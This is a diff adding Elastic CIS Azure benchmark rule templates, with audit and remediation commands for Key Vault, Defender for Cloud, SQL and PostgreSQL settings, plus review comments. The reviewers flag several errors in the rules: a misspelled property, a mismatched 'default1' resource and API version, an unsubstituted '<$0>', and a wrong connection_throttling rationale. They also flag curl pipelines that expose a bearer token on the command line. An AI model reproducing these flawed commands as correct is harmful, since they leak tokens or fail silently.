+ "audit": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that the status of the key is `Enabled`.\n4. For each enabled key, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nGet a list of all the key vaults in your Azure environment by running the following command:\n\n```\naz keyvault list\n```\n\nFor each key vault, ensure that the output of the below command contains Key ID (kid), enabled status as `true` and Expiration date (expires) is not empty or null:\n\n```\naz keyvault key list --vault-name --query '[*].{\"kid\":kid,\"enabled\":attributes.enabled,\"expires\":attributes.expires}' \n```\n\n**From PowerShell:**\n\nRetrieve a list of Azure Key vaults:\n\n```\nGet-AzKeyVault\n```\n\nFor each Key vault, run the following command to determine which vaults are configured to not use RBAC:\n\n```\nGet-AzKeyVault -VaultName \n```\n\nFor each Key vault with the `EnableRbacAuthorizatoin` setting set to `False` or empty, run the following command.\n\n```\nGet-AzKeyVaultKey -VaultName \n```\n\nMake sure the `Expires` setting is configured with a value as appropriate wherever the `Enabled` setting is set to `True`.",
+ "remediation": "**From Azure Portal:**\n\n1. Go to `Key vaults`.\n2. For each Key vault, click on `Keys`.\n3. In the main pane, ensure that the status of the key is `Enabled`.\n4. For each enabled key, ensure that an appropriate `Expiration date` is set.\n\n**From Azure CLI:**\n\nUpdate the `Expiration date` for the key using the below command:\n\n```\naz keyvault key set-attributes --name --vault-name --expires Y-m-d'T'H:M:S'Z'\n```\n\n**Note:**\nTo view the expiration date on all keys in a Key Vault using Microsoft API, the \"List\" Key permission is required.\n\nTo update the expiration date for the keys:\n5. Go to Key vault, click on `Access policies`.\n6. Click on `Create` and add an access policy with the `Update` permission (in the Key Permissions - Key Management Operations section).\n\n**From PowerShell**\n\n```\nSet-AzKeyVaultKeyAttribute -VaultName -Name -Expires \n```",
+ "section": "Key Vault",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 8.2",
+ "Key Vault"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "8.2",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_8_2"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json b/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json
new file mode 100644
index 00000000000..c0fa9d20877
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/87952b8d-f537-5f8a-b57b-63a31b031170.json
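Review bot: The audit string tells the reader to look for the `EnableRbacAuthorizatoin` setting, which is misspelled; the Key Vault property is `EnableRbacAuthorization`, and someone searching `Get-AzKeyVault` output for the misspelled name will not find it. The remediation also ends its numbered list at step 4, switches to a `**Note:**` paragraph, and then resumes numbering at 5 and 6 under "To update the expiration date for the keys", which reads as if two steps went missing; renumbering those as a fresh list under the note would make the procedure clearer.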
@@ -0,0 +1,38 @@
+{
+ "id": "87952b8d-f537-5f8a-b57b-63a31b031170",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification",
+ "id": "87952b8d-f537-5f8a-b57b-63a31b031170",
+ "name": "Ensure 'Additional email addresses' is Configured with a Security Contact Email",
+ "profile_applicability": "* Level 1",
+ "description": "Microsoft Defender for Cloud emails the subscription owners whenever a high-severity alert is triggered for their subscription.\nYou should provide a security contact email address as an additional email address.",
+ "rationale": "Microsoft Defender for Cloud emails the Subscription Owner to notify them about security alerts.\nAdding your Security Contact's email address to the 'Additional email addresses' field ensures that your organization's Security Team is included in these alerts.\nThis ensures that the proper people are aware of any potential compromise in order to mitigate the risk in a timely fashion.",
+ "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu.\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that a valid security contact email address is listed in the `Additional email addresses` field \n\n**From Azure CLI**\n\nEnsure the output of the below command is set not empty and is set with appropriate email ids.\n\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.[] | select(.name==\"default\")'|jq '.properties.emails'\n```",
+ "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Enter a valid security contact email address (or multiple addresses separated by commas) in the `Additional email addresses` field \n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Security contact emails` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts/default?api-version=2020-01-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default\",\n \"name\": \"default\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\"\n }\n }\n```",
+ "section": "Microsoft Defender for Cloud",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 2.1.19",
+ "Microsoft Defender for Cloud"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "2.1.19",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_2_1_19"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json b/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json
new file mode 100644
index 00000000000..ae3ad10017f
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/88734e31-d055-58ba-bf70-7d40d0b4e707.json
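Review bot: The CLI audit and remediation commands pipe the `az account get-access-token` output into `xargs -L1 bash -c 'curl ... -H "Authorization: Bearer $1" ...'`, so the bearer token becomes a process argument that is visible in `ps` output and in any shell or CI command logging; the 97504079… hunk carries the same construction. A form that keeps the token out of argv and reuses the current `az login` session is `az rest --method get --url "https://management.azure.com/subscriptions/<subscription-id>/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview"`. The remediation text also says to replace `validEmailAddress` in `input.json`, but the JSON shown has `"email": ""` and no such placeholder, so the instruction cannot be followed as written.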
@@ -0,0 +1,38 @@
+{
+ "id": "88734e31-d055-58ba-bf70-7d40d0b4e707",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "This is only required for App Services which require authentication. Enabling on site like a marketing or support website will prevent unauthenticated access which would be undesirable.\n\nAdding Authentication requirement will increase cost of App Service and require additional security components to facilitate the authentication.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/app-service/app-service-authentication-overview\n2. https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#website-contributor\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-privileged-access#pa-5-automate-entitlement-management\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-governance-strategy#gs-6-define-identity-and-privileged-access-strategy",
+ "id": "88734e31-d055-58ba-bf70-7d40d0b4e707",
+ "name": "Ensure App Service Authentication is set up for apps in Azure App Service",
+ "profile_applicability": "* Level 2",
+ "description": "Azure App Service Authentication is a feature that can prevent anonymous HTTP requests from reaching a Web Application or authenticate those with tokens before they reach the app.\nIf an anonymous request is received from a browser, App Service will redirect to a logon page.\nTo handle the logon process, a choice from a set of identity providers can be made, or a custom authentication mechanism can be implemented.",
+ "rationale": "By Enabling App Service Authentication, every incoming HTTP request passes through it before being handled by the application code.\nIt also handles authentication of users with the specified provider (Azure Active Directory, Facebook, Google, Microsoft Account, and Twitter), validation, storing and refreshing of tokens, managing the authenticated sessions and injecting identity information into request headers.",
+ "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, Click on `Authentication`\n5. Ensure that `App Service authentication` set to `Enabled` (Will only appear once an Identity provider is set up/selected)\n\n**From Azure CLI**\n\nTo check App Service Authentication status for an existing app, run the following command,\n\n```\naz webapp auth show --resource-group --name --query enabled\n```\n\nThe output should return `true` if App Service authentication is set to `On`.",
+ "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com \n2. Go to `App Services`\n3. Click on each App\n4. Under `Setting` section, click on `Authentication`\n5. If no identity providers are set up, then click `Add identity provider`\n6. Choose other parameters as per your requirements and click on `Add`\n\n**From Azure CLI**\n\nTo set App Service Authentication for an existing app, run the following command:\n```\naz webapp auth update --resource-group --name --enabled true\n```\n**Note**\n\nIn order to access `App Service authentication` settings for Web app using Microsoft API requires `Website contributor` permission at subscription level.\nA custom role can be created in place of `Website contributor` to provide more specific permission and maintain the principle of least privileged access.",
+ "section": "AppService",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 9.1",
+ "AppService"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "9.1",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_9_1"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json b/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json
new file mode 100644
index 00000000000..0d3038cf350
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/89ebec6b-3cc4-5898-a3b9-534174f93051.json
@@ -0,0 +1,38 @@
+{
+ "id": "89ebec6b-3cc4-5898-a3b9-534174f93051",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/sql/relational-databases/security/encryption/transparent-data-encryption-with-azure-sql-database\n2. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-4-enable-data-at-rest-encryption-by-default\n3. https://learn.microsoft.com/en-us/powershell/module/az.sql/set-azsqldatabasetransparentdataencryption?view=azps-9.2.0",
+ "id": "89ebec6b-3cc4-5898-a3b9-534174f93051",
+ "name": "Ensure that 'Data encryption' is set to 'On' on a SQL Database",
+ "profile_applicability": "* Level 1",
+ "description": "Enable Transparent Data Encryption on every SQL server.",
+ "rationale": "Azure SQL Database transparent data encryption helps protect against the threat of malicious activity by performing real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.",
+ "audit": "**From Azure Portal**\n\n1. Go to `SQL databases`\n2. For each DB instance\n3. Click on `Transparent data encryption`\n4. Ensure that `Data encryption` is set to `On`\n\n**From Azure CLI**\n\nEnsure the output of the below command is `Enabled`\n\n```\naz sql db tde show --resource-group --server --database --query status\n```\n\n**From PowerShell**\n\nGet a list of SQL Servers.\n\n```\nGet-AzSqlServer\n```\n\nFor each server, list the databases.\n\n```\nGet-AzSqlDatabase -ServerName -ResourceGroupName \n```\n\nFor each database not listed as a `Master` database, check for Transparent Data Encryption.\n\n```\nGet-AzSqlDatabaseTransparentDataEncryption -ResourceGroupName -ServerName -DatabaseName \n```\n\nMake sure `DataEncryption` is `Enabled` for each database except the `Master` database.",
+ "remediation": "**From Azure Portal**\n\n1. Go to `SQL databases`\n2. For each DB instance\n3. Click on `Transparent data encryption`\n4. Set `Data encryption` to `On`\n\n**From Azure CLI**\n\nUse the below command to enable `Transparent data encryption` for SQL DB instance.\n\n```\naz sql db tde set --resource-group --server --database --status Enabled\n```\n\n**From PowerShell**\n\nUse the below command to enable `Transparent data encryption` for SQL DB instance.\n\n```\nSet-AzSqlDatabaseTransparentDataEncryption -ResourceGroupName -ServerName -DatabaseName -State 'Enabled'\n```\n\n**Note:**\n\n- TDE cannot be used to encrypt the logical master database in SQL Database.\nThe master database contains objects that are needed to perform the TDE operations on the user databases.\n\n- Azure Portal does not show master databases per SQL server.\nHowever, CLI/API responses will show master databases.",
+ "section": "SQL Server - Auditing",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.1.5",
+ "SQL Server - Auditing"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.1.5",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_1_5"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json b/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json
new file mode 100644
index 00000000000..3b362fca7f6
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/9272d2b5-4e25-5658-8a6c-d917f60134ec.json
@@ -0,0 +1,38 @@
+{
+ "id": "9272d2b5-4e25-5658-8a6c-d917f60134ec",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Enabling this setting will enable a log of all disconnections. If this is enabled for a high traffic server, the log may grow exponentially.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name",
+ "id": "9272d2b5-4e25-5658-8a6c-d917f60134ec",
+ "name": "Ensure server parameter 'log_disconnections' is set to 'ON' for PostgreSQL Database Server",
+ "profile_applicability": "* Level 1",
+ "description": "Enable `log_disconnections` on `PostgreSQL Servers`.",
+ "rationale": "Enabling `log_disconnections` helps PostgreSQL Database to `Logs end of a session`, including duration, which in turn generates query and error logs.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.",
+ "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Go to `Azure Database` for `PostgreSQL servers`\n3. For each database, click on `Server parameters`\n4. Search for `log_disconnections`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `log_disconnections` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name log_disconnections\n```\n\n**From PowerShell**\n\nEnsure `log_disconnections` value is set to `ON`\n\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_disconnections\n```",
+ "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Go to `Azure Database` for `PostgreSQL servers`\n3. For each database, click on `Server parameters`\n4. Search for `log_disconnections`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `log_disconnections` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name log_disconnections --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `log_disconnections` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name log_disconnections -Value on\n```",
+ "section": "PostgreSQL Database Server",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.3.4",
+ "PostgreSQL Database Server"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.3.4",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_3_4"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json b/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json
new file mode 100644
index 00000000000..50f13ef726b
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/97504079-0d62-5d0a-9939-17b57b444547.json
@@ -0,0 +1,38 @@
+{
+ "id": "97504079-0d62-5d0a-9939-17b57b444547",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/security-center/security-center-provide-security-contact-details\n2. https://docs.microsoft.com/en-us/rest/api/securitycenter/securitycontacts/list\n3. https://docs.microsoft.com/en-us/rest/api/securitycenter/security-contacts\n4. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-incident-response#ir-2-preparation--setup-incident-notification",
+ "id": "97504079-0d62-5d0a-9939-17b57b444547",
+ "name": "Ensure That 'Notify about alerts with the following severity' is Set to 'High'",
+ "profile_applicability": "* Level 1",
+ "description": "Enables emailing security alerts to the subscription owner or other designated security contact.",
+ "rationale": "Enabling security alert emails ensures that security alert emails are received from Microsoft.\nThis ensures that the right people are aware of any potential security issues and are able to mitigate the risk.",
+ "audit": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Ensure that the `Notify about alerts with the following severity (or higher):` setting is checked and set to `High`\n\n**From Azure CLI**\n\nEnsure the output of below command is set to `true`, enter your Subscription ID at the $0 between /subscriptions/<$0>/providers.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X GET -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/$0/providers/Microsoft.Security/securityContacts?api-version=2020-01-01-preview' | jq '.|.[] | select(.name==\"default\")'|jq '.properties.alertNotifications'\n```",
+ "remediation": "**From Azure Portal**\n\n1. From Azure Home select the Portal Menu\n2. Select `Microsoft Defender for Cloud`\n3. Click on `Environment Settings`\n4. Click on the appropriate Management Group, Subscription, or Workspace\n5. Click on `Email notifications`\n6. Under `Notification types`, check the check box next to `Notify about alerts with the following severity (or higher):` and select `High` from the drop down menu\n7. Click `Save`\n\n**From Azure CLI**\n\nUse the below command to set `Send email notification for high severity alerts` to `On`.\n```\naz account get-access-token --query \"{subscription:subscription,accessToken:accessToken}\" --out tsv | xargs -L1 bash -c 'curl -X PUT -H \"Authorization: Bearer $1\" -H \"Content-Type: application/json\" https://management.azure.com/subscriptions/<$0>/providers/Microsoft.Security/securityContacts/default1?api-version=2017-08-01-preview -d@\"input.json\"'\n```\nWhere `input.json` contains the data below, replacing `validEmailAddress` with a single email address or multiple comma-separated email addresses:\n```\n {\n \"id\": \"/subscriptions//providers/Microsoft.Security/securityContacts/default1\",\n \"name\": \"default1\",\n \"type\": \"Microsoft.Security/securityContacts\",\n \"properties\": {\n \"email\": \"\",\n \"alertNotifications\": \"On\",\n \"alertsToAdmins\": \"On\"\n }\n }\n```",
+ "section": "Microsoft Defender for Cloud",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 2.1.20",
+ "Microsoft Defender for Cloud"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "2.1.20",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_2_1_20"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json b/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json
new file mode 100644
index 00000000000..fc326cb7e90
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/9ce2276b-db96-5aad-9329-08ce874c5db6.json
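Review bot: The remediation command targets `securityContacts/default1` with `api-version=2017-08-01-preview`, while the audit a few lines above lists `securityContacts` with `api-version=2020-01-01-preview` and selects `.name=="default"`, so the check and the fix address different resources; unless `default1` is intentional, the remediation should use `default` and the same API version as the audit. The remediation URL also contains a literal `<$0>` which, inside `bash -c`, is passed to curl unchanged rather than substituted, and the `input.json` note refers to a `validEmailAddress` placeholder that the shown body does not contain. The bearer-token-on-argv concern raised on the 87952b8d… hunk applies to both commands here as well.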
@@ -0,0 +1,38 @@
+{
+ "id": "9ce2276b-db96-5aad-9329-08ce874c5db6",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/rest/api/postgresql/singleserver/configurations/list-by-server\n2. https://docs.microsoft.com/en-us/azure/postgresql/howto-configure-server-parameters-using-portal\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-logging-threat-detection#lt-4-enable-logging-for-azure-resources\n4. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/get-azpostgresqlconfiguration?view=azps-9.2.0#example-2-get-specified-postgresql-configuration-by-name\n5. https://learn.microsoft.com/en-us/powershell/module/az.postgresql/update-azpostgresqlconfiguration?view=azps-9.2.0#example-1-update-postgresql-configuration-by-name",
+ "id": "9ce2276b-db96-5aad-9329-08ce874c5db6",
+ "name": "Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server",
+ "profile_applicability": "* Level 1",
+ "description": "Enable `connection_throttling` on `PostgreSQL Servers`.",
+ "rationale": "Enabling `connection_throttling` helps the PostgreSQL Database to `Set the verbosity of logged messages`.\nThis in turn generates query and error logs with respect to concurrent connections that could lead to a successful Denial of Service (DoS) attack by exhausting connection resources.\nA system can also fail or be degraded by an overload of legitimate users.\nQuery and error logs can be used to identify, troubleshoot, and repair configuration errors and sub-optimal performance.",
+ "audit": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `connection_throttling`.\n5. Ensure that value is set to `ON`.\n\n**From Azure CLI**\n\nEnsure `connection_throttling` value is set to `ON`\n```\naz postgres server configuration show --resource-group --server-name --name connection_throttling\n```\n\n**From PowerShell**\n\nEnsure `connection_throttling` value is set to `ON`\n```\nGet-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name connection_throttling\n```",
+ "remediation": "**From Azure Portal**\n\n1. Login to Azure Portal using https://portal.azure.com.\n2. Go to `Azure Database for PostgreSQL servers`.\n3. For each database, click on `Server parameters`.\n4. Search for `connection_throttling`.\n5. Click `ON` and save.\n\n**From Azure CLI**\n\nUse the below command to update `connection_throttling` configuration.\n```\naz postgres server configuration set --resource-group --server-name --name connection_throttling --value on\n```\n\n**From PowerShell**\n\nUse the below command to update `connection_throttling` configuration.\n```\nUpdate-AzPostgreSqlConfiguration -ResourceGroupName -ServerName -Name connection_throttling -Value on\n```",
+ "section": "PostgreSQL Database Server",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.3.5",
+ "PostgreSQL Database Server"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.3.5",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_3_5"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json b/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json
new file mode 100644
index 00000000000..89209253988
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/9fb9a46f-de59-580b-938e-829090bd3975.json
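Review bot: The rationale's first sentence says `connection_throttling` helps the database to `Set the verbosity of logged messages`, which describes a logging-level parameter rather than this one and does not match the rule name. If I read Azure's server-parameter description correctly, `connection_throttling` enables temporary per-IP connection throttling after repeated invalid-password login failures, which is also the property that makes it relevant to the connection-exhaustion argument the rest of the paragraph makes; rewording the first sentence along those lines would make the rationale internally consistent. The audit and remediation commands are not affected by this.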
@@ -0,0 +1,38 @@
+{
+ "id": "9fb9a46f-de59-580b-938e-829090bd3975",
+ "type": "csp-rule-template",
+ "attributes": {
+ "metadata": {
+ "impact": "Microsoft Defender for SQL is a paid feature and will incur additional cost for each SQL server.",
+ "default_value": "",
+ "references": "1. https://docs.microsoft.com/en-us/azure/azure-sql/database/azure-defender-for-sql?view=azuresql\n2. https://docs.microsoft.com/en-us/powershell/module/azurerm.sql/get-azurermsqlserverthreatdetectionpolicy?view=azurermps-6.13.0&viewFallbackFrom=azurermps-5.2.0\n3. https://docs.microsoft.com/en-us/security/benchmark/azure/security-controls-v3-data-protection#dp-2-monitor-anomalies-and-threats-targeting-sensitive-data",
+ "id": "9fb9a46f-de59-580b-938e-829090bd3975",
+ "name": "Ensure that Microsoft Defender for SQL is set to 'On' for critical SQL Servers",
+ "profile_applicability": "* Level 2",
+ "description": "Enable \"Microsoft Defender for SQL\" on critical SQL Servers.",
+ "rationale": "Microsoft Defender for SQL is a unified package for advanced SQL security capabilities.\nMicrosoft Defender is available for Azure SQL Database, Azure SQL Managed Instance, and Azure Synapse Analytics.\nIt includes functionality for discovering and classifying sensitive data, surfacing and mitigating potential database vulnerabilities, and detecting anomalous activities that could indicate a threat to your database.\nIt provides a single go-to location for enabling and managing these capabilities.",
+ "audit": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor each production SQL server instance:\n\n2. Click `Microsoft Defender for Cloud`\n3. Ensure that `Enablement Status` is `Enabled`\n\n**From PowerShell**\n\nGet the list of all SQL Servers\n```\nGet-AzSqlServer\n```\nFor each Server\n```\nGet-AzSqlServerAdvancedThreatProtectionSetting -ResourceGroupName -ServerName \n```\nEnsure that `ThreatDetectionState` is set to `Enabled`.",
+ "remediation": "**From Azure Portal**\n\n1. Go to `SQL servers`\n\nFor each production SQL server instance:\n\n2. Click `Microsoft Defender for Cloud`\n3. Click `Enable Microsoft Defender for SQL`\n\n**From PowerShell**\n\nEnable `Advanced Data Security` for a SQL Server: \n```\nSet-AzSqlServerThreatDetectionPolicy -ResourceGroupName -ServerName -EmailAdmins $True\n```\n\nNote:\n- Enabling 'Microsoft Defender for SQL' from the Azure portal enables `Threat Detection`\n- Using Powershell command `Set-AzSqlServerThreatDetectionPolicy` enables `Microsoft Defender for SQL` for a SQL server",
+ "section": "SQL Server - Microsoft Defender for SQL",
+ "version": "1.0",
+ "tags": [
+ "CIS",
+ "AZURE",
+ "CIS 4.2.1",
+ "SQL Server - Microsoft Defender for SQL"
+ ],
+ "benchmark": {
+ "name": "CIS Microsoft Azure Foundations",
+ "version": "v2.0.0",
+ "id": "cis_azure",
+ "rule_number": "4.2.1",
+ "posture_type": "cspm"
+ },
+ "rego_rule_id": "cis_4_2_1"
+ }
+ },
+ "migrationVersion": {
+ "csp-rule-template": "8.7.0"
+ },
+ "coreMigrationVersion": "8.7.0"
+}
\ No newline at end of file
diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json b/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json
new file mode 100644
index 00000000000..6a4d43c718f
--- /dev/null
+++ b/packages/cloud_security_posture/kibana/csp_rule_template/a22a5431-1471-534c-8e7c-1e16fe0a857c.json
